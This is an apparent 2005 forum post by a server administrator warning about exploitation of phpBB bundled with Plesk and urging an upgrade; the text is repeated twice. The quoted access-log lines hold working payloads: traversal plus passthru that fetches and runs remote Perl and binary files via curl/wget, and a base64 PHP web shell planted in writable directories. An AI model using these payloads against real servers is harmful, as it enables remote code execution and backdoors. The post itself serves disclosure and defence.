Facebook
Twitter
T
tekmage
Guest
Folks, I've been fighting a battle for the last week or so. Some jack*ss script kiddy has been exploiting a hole in phpBB that ships with Plesk 7.5.3 and below.
I just figured it out last night and I'd like to pass this on ASAP to everyone.
Run, do not walk, to the phpBB.com site and download 2.0.15, then upgrade any and all sites you have using this software.
Here is the exploit attempt in my access_logs, you might want to check through yours asap.
[root@hydra root]# cat /home/httpd/vhosts/*/statistics/logs/access_log* | grep "%20/tmp"
66.250.130.186 - - [29/May/2005:15:15:50 -0700] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=d86b9a329a43539c22cee9a07ab95fe2&niggaip=1&niggaport=1&nigga=passthru(%22cd%20/tmp;curl%20-C%20-%20http://uhoho.gratishost.com/a.pl%20%3E%20a.pl;perl%20a.pl%22); HTTP/1.1" 200 7926 "http://www.FOOOME.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.57.216.163 - - [15/Jan/2005:05:40:59 -0800] "GET /classifiedweapon.htm&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20users.volja.net/kojpic/botek;wget%20users.volja.net/kojpic/botek;chmod%20777%20/tmp/botek;/tmp/botek;rm%20sess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 404 956 "-" "LWP::Simple/5.64"
66.240.141.100 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=718da6c3e60b36417f1d9fa7ea918328&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"cp%20/tmp/.newminibd.php%20\".$cmd);mail(\"[email protected]\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOO.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.240.141.100 - - [02/May/2005:16:56:43 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=ba84ad1a6ff8287142b5f1b0adf0a753&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"mv%20/tmp/.newminibd.php%20\".$cmd);mail(\"[email protected]\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOO.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
[root@hydra root]# 66.240.141.100 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=718da6c3e60b36417f1d9fa7ea918328&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"cp%20/tmp/.newminibd.php%20\".$cmd);mail(\"[email protected]\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOOME.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
If successful it installs a perl script into /tmp that is a udp flood exploit. The file is random name, but mostly it's called ret.pl
I started sweeping any and all perl scripts from my /tmp every 3 mins, that didn't work, I then went down to 1 min.
I tried securing my /tmp by moving it to a new partition, mounting noexec, nosuid. That did squat.
Finally I was able to find that above in the access logs and figured out that it was phpBB. I failed at my first attempt to patch it, and got nailed again that night. So I have blown away any and all old copies and started with a fresh 2.0.15 build on all sites using phpBB.
http://www.phpbb.com/downloads.php
Also note the two above trigger email addresses.
[email protected]
and
[email protected]
You might want to black list those.. I have.
I'm hoping that this works.. Let me know if you've had simular issues..
Best,
-=Dave
I just figured it out last night and I'd like to pass this on ASAP to everyone.
Run, do not walk, to the phpBB.com site and download 2.0.15, then upgrade any and all sites you have using this software.
Here is the exploit attempt in my access_logs, you might want to check through yours asap.
[root@hydra root]# cat /home/httpd/vhosts/*/statistics/logs/access_log* | grep "%20/tmp"
66.250.130.186 - - [29/May/2005:15:15:50 -0700] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=d86b9a329a43539c22cee9a07ab95fe2&niggaip=1&niggaport=1&nigga=passthru(%22cd%20/tmp;curl%20-C%20-%20http://uhoho.gratishost.com/a.pl%20%3E%20a.pl;perl%20a.pl%22); HTTP/1.1" 200 7926 "http://www.FOOOME.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
216.57.216.163 - - [15/Jan/2005:05:40:59 -0800] "GET /classifiedweapon.htm&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20users.volja.net/kojpic/botek;wget%20users.volja.net/kojpic/botek;chmod%20777%20/tmp/botek;/tmp/botek;rm%20sess_189f0f0889555397a4de5485dd611111%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 404 956 "-" "LWP::Simple/5.64"
66.240.141.100 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=718da6c3e60b36417f1d9fa7ea918328&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"cp%20/tmp/.newminibd.php%20\".$cmd);mail(\"[email protected]\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOO.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
66.240.141.100 - - [02/May/2005:16:56:43 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=ba84ad1a6ff8287142b5f1b0adf0a753&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"mv%20/tmp/.newminibd.php%20\".$cmd);mail(\"[email protected]\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOO.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
[root@hydra root]# 66.240.141.100 - - [02/May/2005:14:32:01 -0500] "GET /forum/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&sid=718da6c3e60b36417f1d9fa7ea918328&nigga=$out=\"PGZvcm0gbWV0aG9kPXBvc3Q+CjxpbnB1dCBtYXhMZW5ndGg9NTAwIHNpemU9MTAwIG5hbWU9ZW1haWwgPgo8YnI+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUVudm95ZXI+Cjxicj48L2Zvcm0+Cjx0ZXh0YXJlYSByZWFkb25seSAgY29scz0xMjAgcm93cz0zMD48P1BIUCBzeXN0ZW0oJGVtYWlsKSA/PjwvdGV4dGFyZWE+Cgo=\";$ifp=fopen(\"/tmp/.newminibd.php\",\"wb\");fwrite($ifp,base64_decode($out));fclose($ifp);$cmd=exec(\"find%20../../$pwd%20-perm%20777%20-type%20d\");if($cmd){exec(\"cp%20/tmp/.newminibd.php%20\".$cmd);mail(\"[email protected]\",$_SERVER[SERVER_NAME],\"Site%20:%20\".\"http://\".$_SERVER[SERVER_NAME].substr($cmd,5).\"/.newminibd.php\");} HTTP/1.1" 200 7917 "http://www.FOOOME.com/forum/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
If successful it installs a perl script into /tmp that is a udp flood exploit. The file is random name, but mostly it's called ret.pl
I started sweeping any and all perl scripts from my /tmp every 3 mins, that didn't work, I then went down to 1 min.
I tried securing my /tmp by moving it to a new partition, mounting noexec, nosuid. That did squat.
Finally I was able to find that above in the access logs and figured out that it was phpBB. I failed at my first attempt to patch it, and got nailed again that night. So I have blown away any and all old copies and started with a fresh 2.0.15 build on all sites using phpBB.
http://www.phpbb.com/downloads.php
Also note the two above trigger email addresses.
[email protected]
and
[email protected]
You might want to black list those.. I have.
I'm hoping that this works.. Let me know if you've had simular issues..
Best,
-=Dave